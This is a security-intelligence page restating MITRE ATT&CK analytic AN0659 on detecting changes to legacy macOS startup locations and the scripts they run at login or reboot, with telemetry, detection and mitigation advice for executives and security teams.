AN0659: Analytic 0659
Detection of edits or additions to /etc/rc.common, /Library/StartupItems, or /System/Library/StartupItems and associated script execution during login or reboot.
Analyst context for executives and security teams
This analytic is about spotting persistence-related changes on macOS by monitoring edits or additions to legacy startup locations and associated script execution during login or reboot. For leaders, the value is not the specific file paths alone; it is whether the organization can prove that macOS startup behavior is monitored well enough to support fast containment and reliable incident reconstruction.
Executive priority
Prioritize this where macOS endpoints support business-critical users, administrators, developers, or regulated workflows. The decision point is whether endpoint monitoring, SOC triage, and incident response playbooks can identify unauthorized startup modifications before they become a long-lived foothold. This can also support audit and compliance evidence by showing that persistence-relevant system changes are logged, reviewed, and investigated.
Technical view
Validate monitoring for macOS edits or additions to /etc/rc.common, /Library/StartupItems, and /System/Library/StartupItems, plus script execution associated with login or reboot. Because the ATT&CK object provides no official detection logic and no relationship context, detection engineers should treat this as a coverage requirement rather than a ready-to-run rule. SOC and IR teams should confirm they can correlate file modification events with subsequent process/script execution around login or system reboot timelines.
Likely telemetry
- macOS file creation, modification, and permission-change events for /etc/rc.common, /Library/StartupItems, and /System/Library/StartupItems
- Endpoint process execution telemetry for scripts or commands launched during login or reboot
- User, host, and timestamp context for correlating startup file changes to later execution
- Endpoint security or EDR alerts related to startup item changes, if available
- System logs that can help reconstruct login and reboot activity
Detection direction
- Confirm the monitored platform scope is macOS; do not assume this analytic applies to other operating systems.
- Build or validate detections for additions or edits in the specified startup paths, then correlate with script execution during login or reboot.
- Tune for legitimate administrative or software-maintenance activity to reduce false positives, but require change context for unusual or unauthorized modifications.
- Pay special attention to blind spots where file monitoring is disabled, endpoint agents lack full-disk visibility, or reboot/login execution telemetry is not retained.
- Because no official detection query is provided, test locally with benign change simulations and verify that alerts include enough context for triage.
Mitigation priorities
- Establish baseline ownership, permissions, and expected contents for the specified macOS startup locations.
- Limit administrative write access to startup-related system paths and review exceptions regularly.
- Ensure endpoint logging and retention cover both file changes and associated execution events across macOS systems in scope.
- Create IR procedures for validating whether a startup item change is authorized, removing unauthorized entries, and reviewing nearby login or reboot execution history.
- Use compliance or control testing to demonstrate that persistence-relevant macOS system changes are visible and actionable.
Analyst notes and limits
This Glexia take is based only on the supplied ATT&CK analytic fields. The object identifies macOS startup file locations and associated login or reboot script execution as the behavior of interest, but it does not provide tactics, relationships, sample detection logic, malware/tool context, or mitigation mappings.
No official detection content or relationship context was supplied, so this summary cannot assert specific ATT&CK techniques, adversary use, coverage quality, impact, or active exploitation. Local environment baselines, endpoint telemetry quality, and authorized administrative workflows are required to turn this into a reliable production detection.
Analytic 0659
Detection of edits or additions to /etc/rc.common, /Library/StartupItems, or /System/Library/StartupItems and associated script execution during login or reboot.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | c4cc6f02d20d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0659Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.